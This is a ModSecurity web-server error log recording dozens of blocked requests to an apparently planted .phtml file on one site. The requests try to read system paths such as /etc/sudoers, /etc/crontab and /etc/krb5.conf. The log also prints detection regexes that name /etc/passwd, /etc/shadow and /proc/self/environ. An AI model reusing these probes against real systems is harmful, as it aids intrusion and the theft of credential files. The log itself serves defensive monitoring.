[Fri Mar 20 06:16:46.035309 2026] [:error] [pid 31215:tid 140411582465792] [client 57.141.18.65:57698] [client 57.141.18.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfgF0L0L-SsrnPo5TgQAAAtM"]
[Fri Mar 20 06:16:46.227052 2026] [:error] [pid 15826:tid 140411565680384] [client 57.141.18.36:57708] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfuoXxyEfFpUF8f9thAAAAVU"]
[Fri Mar 20 06:16:47.663828 2026] [:error] [pid 10189:tid 140411574073088] [client 57.141.18.99:57714] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfjJ3M9BSuKP7CAYDYQAAAJQ"]
[Fri Mar 20 06:16:47.664213 2026] [:error] [pid 31215:tid 140411616036608] [client 57.141.18.61:57724] [client 57.141.18.61] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfwF0L0L-SsrnPo5TggAAAs8"]
[Fri Mar 20 06:16:47.679995 2026] [:error] [pid 7893:tid 140411641214720] [client 57.141.18.116:57636] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/profile.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfhCii7xarUs8iHZT5gAAAgw"]
[Fri Mar 20 06:16:47.681896 2026] [:error] [pid 11167:tid 140411691570944] [client 57.141.18.112:57728] [client 57.141.18.112] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qf_HIg5MgXLBnicPliAAAAcY"]
[Fri Mar 20 06:16:47.775190 2026] [:error] [pid 31215:tid 140411540502272] [client 57.141.18.100:57746] [client 57.141.18.100] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QfwF0L0L-SsrnPo5TgwAAAtg"]
[Fri Mar 20 06:16:48.223468 2026] [:error] [pid 26799:tid 140411691570944] [client 57.141.18.91:57756] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QgNa6ubjKNq_cu4a-MAAAA0Y"]
[Fri Mar 20 06:16:48.343299 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.104:57758] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QgLninkcc-iUj5ApKGwAAA4A"]
[Fri Mar 20 06:16:49.836081 2026] [:error] [pid 9818:tid 140411658000128] [client 57.141.18.107:57762] [client 57.141.18.107] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QgV1pVZ5mVmJwsFMbzAAAAEo"]
[Fri Mar 20 06:16:49.836608 2026] [:error] [pid 7235:tid 140411582465792] [client 57.141.18.19:57766] [client 57.141.18.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QgfqxLDW4GITHUkTRRQAAARM"]
[Fri Mar 20 06:16:49.842615 2026] [:error] [pid 11642:tid 140411624429312] [client 57.141.18.67:57760] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QgLninkcc-iUj5ApKHQAAA44"]
[Fri Mar 20 06:16:49.846384 2026] [:error] [pid 26799:tid 140411632822016] [client 57.141.18.39:57768] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qgda6ubjKNq_cu4a-MQAAA00"]
[Fri Mar 20 06:16:50.098586 2026] [:error] [pid 26799:tid 140411658000128] [client 57.141.18.47:57786] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dbus-1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qgta6ubjKNq_cu4a-MgAAA0o"]
[Fri Mar 20 06:16:50.383920 2026] [:error] [pid 9818:tid 140411557287680] [client 57.141.18.81:57792] [client 57.141.18.81] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qgl1pVZ5mVmJwsFMbzQAAAFY"]
[Fri Mar 20 06:16:50.945681 2026] [:error] [pid 7893:tid 140411649607424] [client 57.141.18.58:57804] [client 57.141.18.58] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QghCii7xarUs8iHZT6QAAAgs"]
[Fri Mar 20 06:16:51.323127 2026] [:error] [pid 7235:tid 140411691570944] [client 57.141.18.99:57816] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qg_qxLDW4GITHUkTRRgAAAQY"]
[Fri Mar 20 06:16:51.464692 2026] [:error] [pid 11642:tid 140411548894976] [client 57.141.18.85:57716] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qg7ninkcc-iUj5ApKIAAAA5c"]
[Fri Mar 20 06:16:51.704992 2026] [:error] [pid 26799:tid 140411674785536] [client 57.141.18.21:57832] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0Qg9a6ubjKNq_cu4a-MwAAA0g"]
[Fri Mar 20 06:16:52.403358 2026] [:error] [pid 7235:tid 140411741927168] [client 57.141.18.36:57830] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhPqxLDW4GITHUkTRSAAAAQA"]
[Fri Mar 20 06:16:53.978771 2026] [:error] [pid 11167:tid 140411649607424] [client 57.141.18.91:57884] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/favicon.png"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhPHIg5MgXLBnicPligAAAcs"]
[Fri Mar 20 06:16:53.979941 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.78:57892] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhRCii7xarUs8iHZT7QAAAgA"]
[Fri Mar 20 06:16:53.983249 2026] [:error] [pid 10189:tid 140411674785536] [client 57.141.18.119:57866] [client 57.141.18.119] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhDJ3M9BSuKP7CAYDYwAAAIg"]
[Fri Mar 20 06:16:53.983656 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.103:57890] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dir_colors.lightbgcolor"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhRCii7xarUs8iHZT7AAAAhM"]
[Fri Mar 20 06:16:54.094859 2026] [:error] [pid 31215:tid 140411590858496] [client 57.141.18.70:57918] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhgF0L0L-SsrnPo5ThgAAAtI"]
[Fri Mar 20 06:16:54.397944 2026] [:error] [pid 31215:tid 140411574073088] [client 57.141.18.94:57924] [client 57.141.18.94] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhgF0L0L-SsrnPo5ThwAAAtQ"]
[Fri Mar 20 06:16:54.630104 2026] [:error] [pid 15826:tid 140411641214720] [client 57.141.18.29:57932] [client 57.141.18.29] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhuoXxyEfFpUF8f9tkAAAAUw"]
[Fri Mar 20 06:16:55.049484 2026] [:error] [pid 31215:tid 140411708356352] [client 57.141.18.92:57940] [client 57.141.18.92] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhwF0L0L-SsrnPo5TiAAAAsQ"]
[Fri Mar 20 06:16:55.420897 2026] [:error] [pid 10189:tid 140411691570944] [client 57.141.18.35:57948] [client 57.141.18.35] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QhzJ3M9BSuKP7CAYDZQAAAIY"]
